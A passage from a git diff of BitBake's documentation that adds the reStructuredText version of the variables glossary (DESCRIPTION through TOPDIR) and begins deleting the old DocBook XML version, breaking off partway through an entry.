+ For information on runtime dependencies, see the :term:`RDEPENDS`
+ variable.
+
+ :term:`DESCRIPTION`
+ A long description for the recipe.
+
+ :term:`DL_DIR`
+ The central download directory used by the build process to store
+ downloads. By default, ``DL_DIR`` gets files suitable for mirroring for
+ everything except Git repositories. If you want tarballs of Git
+ repositories, use the :term:`BB_GENERATE_MIRROR_TARBALLS` variable.
+
+ :term:`EXCLUDE_FROM_WORLD`
+ Directs BitBake to exclude a recipe from world builds (i.e.
+ ``bitbake world``). During world builds, BitBake locates, parses and
+ builds all recipes found in every layer exposed in the
+ ``bblayers.conf`` configuration file.
+
+ To exclude a recipe from a world build using this variable, set the
+ variable to "1" in the recipe.
+
+ .. note::
+
+ Recipes added to ``EXCLUDE_FROM_WORLD`` may still be built during a world
+ build in order to satisfy dependencies of other recipes. Adding a
+ recipe to ``EXCLUDE_FROM_WORLD`` only ensures that the recipe is not
+ explicitly added to the list of build targets in a world build.
+
+ :term:`FAKEROOT`
+ Contains the command to use when running a shell script in a fakeroot
+ environment. The ``FAKEROOT`` variable is obsolete and has been
+ replaced by the other ``FAKEROOT*`` variables. See these entries in
+ the glossary for more information.
+
+ :term:`FAKEROOTBASEENV`
+ Lists environment variables to set when executing the command defined
+ by :term:`FAKEROOTCMD` that starts the
+ bitbake-worker process in the fakeroot environment.
+
+ :term:`FAKEROOTCMD`
+ Contains the command that starts the bitbake-worker process in the
+ fakeroot environment.
+
+ :term:`FAKEROOTDIRS`
+ Lists directories to create before running a task in the fakeroot
+ environment.
+
+ :term:`FAKEROOTENV`
+ Lists environment variables to set when running a task in the
+ fakeroot environment. For additional information on environment
+ variables and the fakeroot environment, see the
+ :term:`FAKEROOTBASEENV` variable.
+
+ :term:`FAKEROOTNOENV`
+ Lists environment variables to set when running a task that is not in
+ the fakeroot environment. For additional information on environment
+ variables and the fakeroot environment, see the
+ :term:`FAKEROOTENV` variable.
+
+ :term:`FETCHCMD`
+ Defines the command the BitBake fetcher module executes when running
+ fetch operations. You need to use an override suffix when you use the
+ variable (e.g. ``FETCHCMD_git`` or ``FETCHCMD_svn``).
+
+ :term:`FILE`
+ Points at the current file. BitBake sets this variable during the
+ parsing process to identify the file being parsed. BitBake also sets
+ this variable when a recipe is being executed to identify the recipe
+ file.
+
+ :term:`FILESPATH`
+ Specifies directories BitBake uses when searching for patches and
+ files. The "local" fetcher module uses these directories when
+ handling ``file://`` URLs. The variable behaves like a shell ``PATH``
+ environment variable. The value is a colon-separated list of
+ directories that are searched left-to-right in order.
+
+ :term:`GITDIR`
+ The directory in which a local copy of a Git repository is stored
+ when it is cloned.
+
+ :term:`HGDIR`
+ The directory in which files checked out of a Mercurial system are
+ stored.
+
+ :term:`HOMEPAGE`
+ Website where more information about the software the recipe is
+ building can be found.
+
+ :term:`INHERIT`
+ Causes the named class or classes to be inherited globally. Anonymous
+ functions in the class or classes are not executed for the base
+ configuration and in each individual recipe. The OpenEmbedded build
+ system ignores changes to ``INHERIT`` in individual recipes.
+
+ For more information on ``INHERIT``, see the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` configuration directive`"
+ section.
+
+ :term:`LAYERDEPENDS`
+ Lists the layers, separated by spaces, upon which this recipe
+ depends. Optionally, you can specify a specific layer version for a
+ dependency by adding it to the end of the layer name with a colon,
+ (e.g. "anotherlayer:3" to be compared against
+ :term:`LAYERVERSION`\ ``_anotherlayer`` in
+ this case). BitBake produces an error if any dependency is missing or
+ the version numbers do not match exactly (if specified).
+
+ You use this variable in the ``conf/layer.conf`` file. You must also
+ use the specific layer name as a suffix to the variable (e.g.
+ ``LAYERDEPENDS_mylayer``).
+
+ :term:`LAYERDIR`
+ When used inside the ``layer.conf`` configuration file, this variable
+ provides the path of the current layer. This variable is not
+ available outside of ``layer.conf`` and references are expanded
+ immediately when parsing of the file completes.
+
+ :term:`LAYERDIR_RE`
+ When used inside the ``layer.conf`` configuration file, this variable
+ provides the path of the current layer, escaped for use in a regular
+ expression (:term:`BBFILE_PATTERN`). This
+ variable is not available outside of ``layer.conf`` and references
+ are expanded immediately when parsing of the file completes.
+
+ :term:`LAYERVERSION`
+ Optionally specifies the version of a layer as a single number. You
+ can use this variable within
+ :term:`LAYERDEPENDS` for another layer in
+ order to depend on a specific version of the layer.
+
+ You use this variable in the ``conf/layer.conf`` file. You must also
+ use the specific layer name as a suffix to the variable (e.g.
+ ``LAYERDEPENDS_mylayer``).
+
+ :term:`LICENSE`
+ The list of source licenses for the recipe.
+
+ :term:`MIRRORS`
+ Specifies additional paths from which BitBake gets source code. When
+ the build system searches for source code, it first tries the local
+ download directory. If that location fails, the build system tries
+ locations defined by :term:`PREMIRRORS`, the
+ upstream source, and then locations specified by ``MIRRORS`` in that
+ order.
+
+ :term:`MULTI_PROVIDER_WHITELIST`
+ Allows you to suppress BitBake warnings caused when building two
+ separate recipes that provide the same output.
+
+ BitBake normally issues a warning when building two different recipes
+ where each provides the same output. This scenario is usually
+ something the user does not want. However, cases do exist where it
+ makes sense, particularly in the ``virtual/*`` namespace. You can use
+ this variable to suppress BitBake's warnings.
+
+ To use the variable, list provider names (e.g. recipe names,
+ ``virtual/kernel``, and so forth).
+
+ :term:`OVERRIDES`
+ BitBake uses ``OVERRIDES`` to control what variables are overridden
+ after BitBake parses recipes and configuration files.
+
+ Following is a simple example that uses an overrides list based on
+ machine architectures: OVERRIDES = "arm:x86:mips:powerpc" You can
+ find information on how to use ``OVERRIDES`` in the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax
+ (overrides)`" section.
+
+ :term:`P4DIR`
+ The directory in which a local copy of a Perforce depot is stored
+ when it is fetched.
+
+ :term:`PACKAGES`
+ The list of packages the recipe creates.
+
+ :term:`PACKAGES_DYNAMIC`
+ A promise that your recipe satisfies runtime dependencies for
+ optional modules that are found in other recipes.
+ ``PACKAGES_DYNAMIC`` does not actually satisfy the dependencies, it
+ only states that they should be satisfied. For example, if a hard,
+ runtime dependency (:term:`RDEPENDS`) of another
+ package is satisfied during the build through the
+ ``PACKAGES_DYNAMIC`` variable, but a package with the module name is
+ never actually produced, then the other package will be broken.
+
+ :term:`PE`
+ The epoch of the recipe. By default, this variable is unset. The
+ variable is used to make upgrades possible when the versioning scheme
+ changes in some backwards incompatible way.
+
+ :term:`PERSISTENT_DIR`
+ Specifies the directory BitBake uses to store data that should be
+ preserved between builds. In particular, the data stored is the data
+ that uses BitBake's persistent data API and the data used by the PR
+ Server and PR Service.
+
+ :term:`PF`
+ Specifies the recipe or package name and includes all version and
+ revision numbers (i.e. ``eglibc-2.13-r20+svnr15508/`` and
+ ``bash-4.2-r1/``).
+
+ :term:`PN`
+ The recipe name.
+
+ :term:`PR`
+ The revision of the recipe.
+
+ :term:`PREFERRED_PROVIDER`
+ Determines which recipe should be given preference when multiple
+ recipes provide the same item. You should always suffix the variable
+ with the name of the provided item, and you should set it to the
+ :term:`PN` of the recipe to which you want to give
+ precedence. Some examples: ::
+
+ PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+ PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
+ PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
+
+ :term:`PREFERRED_PROVIDERS`
+ Determines which recipe should be given preference for cases where
+ multiple recipes provide the same item. Functionally,
+ ``PREFERRED_PROVIDERS`` is identical to
+ :term:`PREFERRED_PROVIDER`. However, the ``PREFERRED_PROVIDERS`` variable
+ lets you define preferences for multiple situations using the following
+ form: ::
+
+ PREFERRED_PROVIDERS = "xxx:yyy aaa:bbb ..."
+
+ This form is a convenient replacement for the following: ::
+
+ PREFERRED_PROVIDER_xxx = "yyy"
+ PREFERRED_PROVIDER_aaa = "bbb"
+
+ :term:`PREFERRED_VERSION`
+ If there are multiple versions of recipes available, this variable
+ determines which recipe should be given preference. You must always
+ suffix the variable with the :term:`PN` you want to
+ select, and you should set :term:`PV` accordingly for
+ precedence.
+
+ The ``PREFERRED_VERSION`` variable supports limited wildcard use
+ through the "``%``" character. You can use the character to match any
+ number of characters, which can be useful when specifying versions
+ that contain long revision numbers that potentially change. Here are
+ two examples: ::
+
+ PREFERRED_VERSION_python = "2.7.3"
+ PREFERRED_VERSION_linux-yocto = "4.12%"
+
+ .. important::
+
+ The use of the " % " character is limited in that it only works at the
+ end of the string. You cannot use the wildcard character in any other
+ location of the string.
+
+ :term:`PREMIRRORS`
+ Specifies additional paths from which BitBake gets source code. When
+ the build system searches for source code, it first tries the local
+ download directory. If that location fails, the build system tries
+ locations defined by ``PREMIRRORS``, the upstream source, and then
+ locations specified by :term:`MIRRORS` in that order.
+
+ Typically, you would add a specific server for the build system to
+ attempt before any others by adding something like the following to
+ your configuration: ::
+
+ PREMIRRORS_prepend = "\
+ git://.*/.* http://www.yoctoproject.org/sources/ \n \
+ ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+ http://.*/.* http://www.yoctoproject.org/sources/ \n \
+ https://.*/.* http://www.yoctoproject.org/sources/ \n"
+
+ These changes cause the build system to intercept Git, FTP, HTTP, and
+ HTTPS requests and direct them to the ``http://`` sources mirror. You can
+ use ``file://`` URLs to point to local directories or network shares as
+ well.
+
+ :term:`PROVIDES`
+ A list of aliases by which a particular recipe can be known. By
+ default, a recipe's own ``PN`` is implicitly already in its
+ ``PROVIDES`` list. If a recipe uses ``PROVIDES``, the additional
+ aliases are synonyms for the recipe and can be useful satisfying
+ dependencies of other recipes during the build as specified by
+ ``DEPENDS``.
+
+ Consider the following example ``PROVIDES`` statement from a recipe
+ file ``libav_0.8.11.bb``: ::
+
+ PROVIDES += "libpostproc"
+
+ The ``PROVIDES`` statement results in the "libav" recipe also being known
+ as "libpostproc".
+
+ In addition to providing recipes under alternate names, the
+ ``PROVIDES`` mechanism is also used to implement virtual targets. A
+ virtual target is a name that corresponds to some particular
+ functionality (e.g. a Linux kernel). Recipes that provide the
+ functionality in question list the virtual target in ``PROVIDES``.
+ Recipes that depend on the functionality in question can include the
+ virtual target in :term:`DEPENDS` to leave the
+ choice of provider open.
+
+ Conventionally, virtual targets have names on the form
+ "virtual/function" (e.g. "virtual/kernel"). The slash is simply part
+ of the name and has no syntactical significance.
+
+ :term:`PRSERV_HOST`
+ The network based :term:`PR` service host and port.
+
+ Following is an example of how the ``PRSERV_HOST`` variable is set: ::
+
+ PRSERV_HOST = "localhost:0"
+
+ You must set the variable if you want to automatically start a local PR
+ service. You can set ``PRSERV_HOST`` to other values to use a remote PR
+ service.
+
+ :term:`PV`
+ The version of the recipe.
+
+ :term:`RDEPENDS`
+ Lists a package's runtime dependencies (i.e. other packages) that
+ must be installed in order for the built package to run correctly. If
+ a package in this list cannot be found during the build, you will get
+ a build error.
+
+ Because the ``RDEPENDS`` variable applies to packages being built,
+ you should always use the variable in a form with an attached package
+ name. For example, suppose you are building a development package
+ that depends on the ``perl`` package. In this case, you would use the
+ following ``RDEPENDS`` statement: ::
+
+ RDEPENDS_${PN}-dev += "perl"
+
+ In the example, the development package depends on the ``perl`` package.
+ Thus, the ``RDEPENDS`` variable has the ``${PN}-dev`` package name as part
+ of the variable.
+
+ BitBake supports specifying versioned dependencies. Although the
+ syntax varies depending on the packaging format, BitBake hides these
+ differences from you. Here is the general syntax to specify versions
+ with the ``RDEPENDS`` variable: ::
+
+ RDEPENDS_${PN} = "package (operator version)"
+
+ For ``operator``, you can specify the following: ::
+
+ =
+ <
+ >
+ <=
+ >=
+
+ For example, the following sets up a dependency on version 1.2 or
+ greater of the package ``foo``: ::
+
+ RDEPENDS_${PN} = "foo (>= 1.2)"
+
+ For information on build-time dependencies, see the :term:`DEPENDS`
+ variable.
+
+ :term:`REPODIR`
+ The directory in which a local copy of a ``google-repo`` directory is
+ stored when it is synced.
+
+ :term:`RPROVIDES`
+ A list of package name aliases that a package also provides. These
+ aliases are useful for satisfying runtime dependencies of other
+ packages both during the build and on the target (as specified by
+ ``RDEPENDS``).
+
+ As with all package-controlling variables, you must always use the
+ variable in conjunction with a package name override. Here is an
+ example: ::
+
+ RPROVIDES_${PN} = "widget-abi-2"
+
+ :term:`RRECOMMENDS`
+ A list of packages that extends the usability of a package being
+ built. The package being built does not depend on this list of
+ packages in order to successfully build, but needs them for the
+ extended usability. To specify runtime dependencies for packages, see
+ the ``RDEPENDS`` variable.
+
+ BitBake supports specifying versioned recommends. Although the syntax
+ varies depending on the packaging format, BitBake hides these
+ differences from you. Here is the general syntax to specify versions
+ with the ``RRECOMMENDS`` variable: ::
+
+ RRECOMMENDS_${PN} = "package (operator version)"
+
+ For ``operator``, you can specify the following: ::
+
+ =
+ <
+ >
+ <=
+ >=
+
+ For example, the following sets up a recommend on version
+ 1.2 or greater of the package ``foo``: ::
+
+ RRECOMMENDS_${PN} = "foo (>= 1.2)"
+
+ :term:`SECTION`
+ The section in which packages should be categorized.
+
+ :term:`SRC_URI`
+ The list of source files - local or remote. This variable tells
+ BitBake which bits to pull for the build and how to pull them. For
+ example, if the recipe or append file needs to fetch a single tarball
+ from the Internet, the recipe or append file uses a ``SRC_URI`` entry
+ that specifies that tarball. On the other hand, if the recipe or
+ append file needs to fetch a tarball and include a custom file, the
+ recipe or append file needs an ``SRC_URI`` variable that specifies
+ all those sources.
+
+ The following list explains the available URI protocols:
+
+ - ``file://`` : Fetches files, which are usually files shipped
+ with the metadata, from the local machine. The path is relative to
+ the :term:`FILESPATH` variable.
+
+ - ``bzr://`` : Fetches files from a Bazaar revision control
+ repository.
+
+ - ``git://`` : Fetches files from a Git revision control
+ repository.
+
+ - ``osc://`` : Fetches files from an OSC (OpenSUSE Build service)
+ revision control repository.
+
+ - ``repo://`` : Fetches files from a repo (Git) repository.
+
+ - ``http://`` : Fetches files from the Internet using HTTP.
+
+ - ``https://`` : Fetches files from the Internet using HTTPS.
+
+ - ``ftp://`` : Fetches files from the Internet using FTP.
+
+ - ``cvs://`` : Fetches files from a CVS revision control
+ repository.
+
+ - ``hg://`` : Fetches files from a Mercurial (``hg``) revision
+ control repository.
+
+ - ``p4://`` : Fetches files from a Perforce (``p4``) revision
+ control repository.
+
+ - ``ssh://`` : Fetches files from a secure shell.
+
+ - ``svn://`` : Fetches files from a Subversion (``svn``) revision
+ control repository.
+
+ Here are some additional options worth mentioning:
+
+ - ``unpack`` : Controls whether or not to unpack the file if it is
+ an archive. The default action is to unpack the file.
+
+ - ``subdir`` : Places the file (or extracts its contents) into the
+ specified subdirectory. This option is useful for unusual tarballs
+ or other archives that do not have their files already in a
+ subdirectory within the archive.
+
+ - ``name`` : Specifies a name to be used for association with
+ ``SRC_URI`` checksums when you have more than one file specified
+ in ``SRC_URI``.
+
+ - ``downloadfilename`` : Specifies the filename used when storing
+ the downloaded file.
+
+ :term:`SRCDATE`
+ The date of the source code used to build the package. This variable
+ applies only if the source was fetched from a Source Code Manager
+ (SCM).
+
+ :term:`SRCREV`
+ The revision of the source code used to build the package. This
+ variable applies only when using Subversion, Git, Mercurial and
+ Bazaar. If you want to build a fixed revision and you want to avoid
+ performing a query on the remote repository every time BitBake parses
+ your recipe, you should specify a ``SRCREV`` that is a full revision
+ identifier and not just a tag.
+
+ :term:`SRCREV_FORMAT`
+ Helps construct valid :term:`SRCREV` values when
+ multiple source controlled URLs are used in
+ :term:`SRC_URI`.
+
+ The system needs help constructing these values under these
+ circumstances. Each component in the ``SRC_URI`` is assigned a name
+ and these are referenced in the ``SRCREV_FORMAT`` variable. Consider
+ an example with URLs named "machine" and "meta". In this case,
+ ``SRCREV_FORMAT`` could look like "machine_meta" and those names
+ would have the SCM versions substituted into each position. Only one
+ ``AUTOINC`` placeholder is added and if needed. And, this placeholder
+ is placed at the start of the returned string.
+
+ :term:`STAMP`
+ Specifies the base path used to create recipe stamp files. The path
+ to an actual stamp file is constructed by evaluating this string and
+ then appending additional information.
+
+ :term:`STAMPCLEAN`
+ Specifies the base path used to create recipe stamp files. Unlike the
+ :term:`STAMP` variable, ``STAMPCLEAN`` can contain
+ wildcards to match the range of files a clean operation should
+ remove. BitBake uses a clean operation to remove any other stamps it
+ should be removing when creating a new stamp.
+
+ :term:`SUMMARY`
+ A short summary for the recipe, which is 72 characters or less.
+
+ :term:`SVNDIR`
+ The directory in which files checked out of a Subversion system are
+ stored.
+
+ :term:`T`
+ Points to a directory were BitBake places temporary files, which
+ consist mostly of task logs and scripts, when building a particular
+ recipe.
+
+ :term:`TOPDIR`
+ Points to the build directory. BitBake automatically sets this
+ variable.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml
deleted file mode 100644
index 4c29b2464f..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml
+++ /dev/null
@@ -1,2537 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<!-- Dummy chapter -->
-<chapter id='ref-bb-variables-glos'>
-
-<title>Variables Glossary</title>
-
-<para>
- This chapter lists common variables used by BitBake and gives an overview
- of their function and contents.
-</para>
-
-<note>
- Following are some points regarding the variables listed in this glossary:
- <itemizedlist>
- <listitem><para>The variables listed in this glossary
- are specific to BitBake.
- Consequently, the descriptions are limited to that context.
- </para></listitem>
- <listitem><para>Also, variables exist in other systems that use BitBake
- (e.g. The Yocto Project and OpenEmbedded) that have names identical
- to those found in this glossary.
- For such cases, the variables in those systems extend the
- functionality of the variable as it is described here in
- this glossary.
- </para></listitem>
- <listitem><para>Finally, there are variables mentioned in this
- glossary that do not appear in the BitBake glossary.
- These other variables are variables used in systems that use
- BitBake.
- </para></listitem>
- </itemizedlist>
-</note>
-
-<glossary id='ref-bb-variables-glossary'>
-
- <para>
- <link linkend='var-bb-ASSUME_PROVIDED'>A</link>
- <link linkend='var-bb-B'>B</link>
- <link linkend='var-bb-CACHE'>C</link>
- <link linkend='var-bb-DEFAULT_PREFERENCE'>D</link>
- <link linkend='var-bb-EXCLUDE_FROM_WORLD'>E</link>
- <link linkend='var-bb-FAKEROOT'>F</link>
- <link linkend='var-bb-GITDIR'>G</link>
- <link linkend='var-bb-HGDIR'>H</link>
- <link linkend='var-bb-INHERIT'>I</link>
-<!-- <link linkend='var-glossary-j'>J</link> -->
-<!-- <link linkend='var-KARCH'>K</link> -->
- <link linkend='var-bb-LAYERDEPENDS'>L</link>
- <link linkend='var-bb-MIRRORS'>M</link>
-<!-- <link linkend='var-glossary-n'>N</link> -->
- <link linkend='var-bb-OVERRIDES'>O</link>
- <link linkend='var-bb-P4DIR'>P</link>
-<!-- <link linkend='var-QMAKE_PROFILES'>Q</link> -->
- <link linkend='var-bb-RDEPENDS'>R</link>
- <link linkend='var-bb-SECTION'>S</link>
- <link linkend='var-bb-T'>T</link>
-<!-- <link linkend='var-UBOOT_CONFIG'>U</link> -->
-<!-- <link linkend='var-glossary-v'>V</link> -->
-<!-- <link linkend='var-WARN_QA'>W</link> -->
-<!-- <link linkend='var-glossary-x'>X</link> -->
-<!-- <link linkend='var-glossary-y'>Y</link> -->
-<!-- <link linkend='var-glossary-z'>Z</link>-->
- </para>
-
- <glossdiv id='var-bb-glossary-a'><title>A</title>
-
- <glossentry id='var-bb-ASSUME_PROVIDED'><glossterm>ASSUME_PROVIDED</glossterm>
- <glossdef>
- <para>
- Lists recipe names
- (<link linkend='var-bb-PN'><filename>PN</filename></link>
- values) BitBake does not attempt to build.
- Instead, BitBake assumes these recipes have already been
- built.
- </para>
-
- <para>
- In OpenEmbedded-Core, <filename>ASSUME_PROVIDED</filename>
- mostly specifies native tools that should not be built.
- An example is <filename>git-native</filename>, which
- when specified allows for the Git binary from the host to
- be used rather than building
- <filename>git-native</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-
- <glossdiv id='var-bb-glossary-b'><title>B</title>
-
- <glossentry id='var-bb-B'><glossterm>B</glossterm>
- <glossdef>
- <para>
- The directory in which BitBake executes functions
- during a recipe's build process.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_ALLOWED_NETWORKS'><glossterm>BB_ALLOWED_NETWORKS</glossterm>
- <glossdef>
- <para>
- Specifies a space-delimited list of hosts that the fetcher
- is allowed to use to obtain the required source code.
- Following are considerations surrounding this variable:
- <itemizedlist>
- <listitem><para>
- This host list is only used if
- <link linkend='var-bb-BB_NO_NETWORK'><filename>BB_NO_NETWORK</filename></link>
- is either not set or set to "0".
- </para></listitem>
- <listitem><para>
- Limited support for the "<filename>*</filename>"
- wildcard character for matching against the
- beginning of host names exists.
- For example, the following setting matches
- <filename>git.gnu.org</filename>,
- <filename>ftp.gnu.org</filename>, and
- <filename>foo.git.gnu.org</filename>.
- <literallayout class='monospaced'>
- BB_ALLOWED_NETWORKS = "*.gnu.org"
- </literallayout>
- <note><title>Important</title>
- <para>The use of the "<filename>*</filename>"
- character only works at the beginning of
- a host name and it must be isolated from
- the remainder of the host name.
- You cannot use the wildcard character in any
- other location of the name or combined with
- the front part of the name.</para>
-
- <para>For example,
- <filename>*.foo.bar</filename> is supported,
- while <filename>*aa.foo.bar</filename> is not.
- </para>
- </note>
- </para></listitem>
- <listitem><para>
- Mirrors not in the host list are skipped and
- logged in debug.
- </para></listitem>
- <listitem><para>
- Attempts to access networks not in the host list
- cause a failure.
- </para></listitem>
- </itemizedlist>
- Using <filename>BB_ALLOWED_NETWORKS</filename> in
- conjunction with
- <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- is very useful.
- Adding the host you want to use to
- <filename>PREMIRRORS</filename> results in the source code
- being fetched from an allowed location and avoids raising
- an error when a host that is not allowed is in a
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
- statement.
- This is because the fetcher does not attempt to use the
- host listed in <filename>SRC_URI</filename> after a
- successful fetch from the
- <filename>PREMIRRORS</filename> occurs.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_CONSOLELOG'><glossterm>BB_CONSOLELOG</glossterm>
- <glossdef>
- <para>
- Specifies the path to a log file into which BitBake's user
- interface writes output during the build.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_CURRENTTASK'><glossterm>BB_CURRENTTASK</glossterm>
- <glossdef>
- <para>
- Contains the name of the currently running task.
- The name does not include the
- <filename>do_</filename> prefix.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_DANGLINGAPPENDS_WARNONLY'><glossterm>BB_DANGLINGAPPENDS_WARNONLY</glossterm>
- <glossdef>
- <para>
- Defines how BitBake handles situations where an append
- file (<filename>.bbappend</filename>) has no
- corresponding recipe file (<filename>.bb</filename>).
- This condition often occurs when layers get out of sync
- (e.g. <filename>oe-core</filename> bumps a
- recipe version and the old recipe no longer exists and the
- other layer has not been updated to the new version
- of the recipe yet).
- </para>
-
- <para>
- The default fatal behavior is safest because it is
- the sane reaction given something is out of sync.
- It is important to realize when your changes are no longer
- being applied.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_DEFAULT_TASK'><glossterm>BB_DEFAULT_TASK</glossterm>
- <glossdef>
- <para>
- The default task to use when none is specified (e.g.
- with the <filename>-c</filename> command line option).
- The task name specified should not include the
- <filename>do_</filename> prefix.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_DISKMON_DIRS'><glossterm>BB_DISKMON_DIRS</glossterm>
- <glossdef>
- <para>
- Monitors disk space and available inodes during the build
- and allows you to control the build based on these
- parameters.
- </para>
-
- <para>
- Disk space monitoring is disabled by default.
- When setting this variable, use the following form:
- <literallayout class='monospaced'>
- BB_DISKMON_DIRS = "&lt;action&gt;,&lt;dir&gt;,&lt;threshold&gt; [...]"
-
- where:
-
- &lt;action&gt; is:
- ABORT: Immediately abort the build when
- a threshold is broken.
- STOPTASKS: Stop the build after the currently
- executing tasks have finished when
- a threshold is broken.
- WARN: Issue a warning but continue the
- build when a threshold is broken.
- Subsequent warnings are issued as
- defined by the
- <link linkend='var-bb-BB_DISKMON_WARNINTERVAL'>BB_DISKMON_WARNINTERVAL</link> variable,
- which must be defined.
-
- &lt;dir&gt; is:
- Any directory you choose. You can specify one or
- more directories to monitor by separating the
- groupings with a space. If two directories are
- on the same device, only the first directory
- is monitored.
-
- &lt;threshold&gt; is:
- Either the minimum available disk space,
- the minimum number of free inodes, or
- both. You must specify at least one. To
- omit one or the other, simply omit the value.
- Specify the threshold using G, M, K for Gbytes,
- Mbytes, and Kbytes, respectively. If you do
- not specify G, M, or K, Kbytes is assumed by
- default. Do not use GB, MB, or KB.
- </literallayout>
- </para>
-
- <para>
- Here are some examples:
- <literallayout class='monospaced'>
- BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
- BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
- BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
- </literallayout>
- The first example works only if you also set
- the <link linkend='var-bb-BB_DISKMON_WARNINTERVAL'><filename>BB_DISKMON_WARNINTERVAL</filename></link> variable.
- This example causes the build system to immediately
- abort when either the disk space in <filename>${TMPDIR}</filename> drops
- below 1 Gbyte or the available free inodes drops below
- 100 Kbytes.
- Because two directories are provided with the variable, the
- build system also issues a
- warning when the disk space in the
- <filename>${SSTATE_DIR}</filename> directory drops
- below 1 Gbyte or the number of free inodes drops
- below 100 Kbytes.
- Subsequent warnings are issued during intervals as
- defined by the <filename>BB_DISKMON_WARNINTERVAL</filename>
- variable.
- </para>
-
- <para>
- The second example stops the build after all currently
- executing tasks complete when the minimum disk space
- in the <filename>${TMPDIR}</filename>
- directory drops below 1 Gbyte.
- No disk monitoring occurs for the free inodes in this case.
- </para>
-
- <para>
- The final example immediately aborts the build when the
- number of free inodes in the <filename>${TMPDIR}</filename> directory
- drops below 100 Kbytes.
- No disk space monitoring for the directory itself occurs
- in this case.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_DISKMON_WARNINTERVAL'><glossterm>BB_DISKMON_WARNINTERVAL</glossterm>
- <glossdef>
- <para>
- Defines the disk space and free inode warning intervals.
- </para>
-
- <para>
- If you are going to use the
- <filename>BB_DISKMON_WARNINTERVAL</filename> variable, you must
- also use the
- <link linkend='var-bb-BB_DISKMON_DIRS'><filename>BB_DISKMON_DIRS</filename></link> variable
- and define its action as "WARN".
- During the build, subsequent warnings are issued each time
- disk space or number of free inodes further reduces by
- the respective interval.
- </para>
-
- <para>
- If you do not provide a <filename>BB_DISKMON_WARNINTERVAL</filename>
- variable and you do use <filename>BB_DISKMON_DIRS</filename> with
- the "WARN" action, the disk monitoring interval defaults to
- the following:
- <literallayout class='monospaced'>
- BB_DISKMON_WARNINTERVAL = "50M,5K"
- </literallayout>
- </para>
-
- <para>
- When specifying the variable in your configuration file,
- use the following form:
- <literallayout class='monospaced'>
- BB_DISKMON_WARNINTERVAL = "&lt;disk_space_interval&gt;,&lt;disk_inode_interval&gt;"
-
- where:
-
- &lt;disk_space_interval&gt; is:
- An interval of memory expressed in either
- G, M, or K for Gbytes, Mbytes, or Kbytes,
- respectively. You cannot use GB, MB, or KB.
-
- &lt;disk_inode_interval&gt; is:
- An interval of free inodes expressed in either
- G, M, or K for Gbytes, Mbytes, or Kbytes,
- respectively. You cannot use GB, MB, or KB.
- </literallayout>
- </para>
-
- <para>
- Here is an example:
- <literallayout class='monospaced'>
- BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
- BB_DISKMON_WARNINTERVAL = "50M,5K"
- </literallayout>
- These variables cause BitBake to
- issue subsequent warnings each time the available
- disk space further reduces by 50 Mbytes or the number
- of free inodes further reduces by 5 Kbytes in the
- <filename>${SSTATE_DIR}</filename> directory.
- Subsequent warnings based on the interval occur each time
- a respective interval is reached beyond the initial warning
- (i.e. 1 Gbytes and 100 Kbytes).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_ENV_WHITELIST'><glossterm>BB_ENV_WHITELIST</glossterm>
- <glossdef>
- <para>
- Specifies the internal whitelist of variables to allow
- through from the external environment into BitBake's
- datastore.
- If the value of this variable is not specified
- (which is the default), the following list is used:
- <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>,
- <link linkend='var-bb-BB_PRESERVE_ENV'><filename>BB_PRESERVE_ENV</filename></link>,
- <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>,
- and
- <link linkend='var-bb-BB_ENV_EXTRAWHITE'><filename>BB_ENV_EXTRAWHITE</filename></link>.
- <note>
- You must set this variable in the external environment
- in order for it to work.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_ENV_EXTRAWHITE'><glossterm>BB_ENV_EXTRAWHITE</glossterm>
- <glossdef>
- <para>
- Specifies an additional set of variables to allow through
- (whitelist) from the external environment into BitBake's
- datastore.
- This list of variables are on top of the internal list
- set in
- <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>.
- <note>
- You must set this variable in the external
- environment in order for it to work.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_FETCH_PREMIRRORONLY'><glossterm>BB_FETCH_PREMIRRORONLY</glossterm>
- <glossdef>
- <para>
- When set to "1", causes BitBake's fetcher module to only
- search
- <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- for files.
- BitBake will not search the main
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
- or
